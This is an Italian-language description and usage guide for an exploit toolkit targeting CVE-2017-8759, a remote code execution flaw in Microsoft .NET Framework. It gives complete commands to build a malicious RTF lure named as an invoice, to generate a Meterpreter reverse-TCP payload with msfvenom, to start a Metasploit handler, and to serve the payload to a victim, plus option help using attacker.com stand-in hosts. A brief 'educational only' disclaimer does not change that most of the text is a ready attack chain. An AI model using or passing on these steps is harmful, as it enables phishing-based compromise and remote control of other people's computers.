
Exploit toolkit CVE-2017-8759 - v1.0 è un pratico script Python che fornisce a penetration tester e ricercatori di sicurezza un modo rapido ed efficace per testare la RCE di Microsoft .NET Framework. Può generare un file RTF dannoso e consegnare metasploit / meterpreter / altri payload alla vittima senza alcuna configurazione complessa.
Questo programma è SOLO a scopo educativo. Non utilizzarlo senza autorizzazione. Vale la consueta dichiarazione di non responsabilità, in particolare il fatto che io (bhdresh) non sono responsabile per alcun danno causato dall'uso diretto o indiretto delle informazioni o delle funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet non si assume ALCUNA responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Utilizzando questo programma accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è responsabilità di bhdresh.
Infine, questo è uno sviluppo personale, per favore rispetta la sua filosofia e non usarlo per scopi illeciti!
Licenza CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
Sono state introdotte le seguenti funzionalità nello script
- Genera file RTF dannosi
- Modalità di exploit per il file RTF generato
Versione: Python 2.7.13
1) Genera il file RTF dannoso
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Opzionale, se si usa MSF Payload): genera il payload metasploit e avvia l'handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Avvia il toolkit in modalità exploit per consegnare il payload locale
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Questo è un pratico toolkit per sfruttare CVE-2017-8759 (RCE di Microsoft .NET Framework)
Modalità:
-M gen Genera solo il file dannoso
Genera un file RTF dannoso:
-w <Filename.rtf> Nome del file RTF dannoso (condividi questo file con la vittima).
-u <http://attacker.com/test.txt> Percorso del file txt remoto. Normalmente, dovrebbe essere un dominio o un IP dove questo tool è in esecuzione.
Per esempio, http://attackerip.com/test.txt (Questo URL verrà incluso nel file RTF dannoso e verrà richiesto quando la vittima aprirà il file RTF dannoso).
-M exp Avvia la modalità di exploit
Exploit:
-p <TCP port:Default 80> Numero della porta locale.
-e <http://attacker.com/shell.exe> Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.
-l </tmp/shell.exe> Specifica il percorso locale di un file eseguibile / shell meterpreter / payload.
@bhdresh
@Voulnet, @vysec, @bhdresh
Ovviamente, non sono uno sviluppatore a tempo pieno, quindi aspettatevi qualche intoppo.
Per favore segnala bug e problemi tramite https://github.com/bhdresh/CVE-2017-8759/issues/new